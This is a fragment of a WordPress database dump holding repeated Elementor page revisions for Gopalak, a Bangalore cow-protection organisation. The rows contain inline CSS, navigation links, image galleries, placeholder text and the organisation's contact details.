.elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:46:07','2022-10-13 10:16:07','',1373,'https://gopalak.in/?p=1698',0,'revision','',0),(1699,1,'2022-10-13 15:46:07','2022-10-13 10:16:07','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:46:07','2022-10-13 10:16:07','',1373,'https://gopalak.in/?p=1699',0,'revision','',0),(1700,1,'2022-10-13 15:50:08','2022-10-13 10:20:08','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:50:08','2022-10-13 10:20:08','',1373,'https://gopalak.in/?p=1700',0,'revision','',0),(1701,1,'2022-10-13 15:50:08','2022-10-13 10:20:08','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:50:08','2022-10-13 10:20:08','',1373,'https://gopalak.in/?p=1701',0,'revision','',0),(1702,1,'2022-10-13 15:50:08','2022-10-13 10:20:08','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box 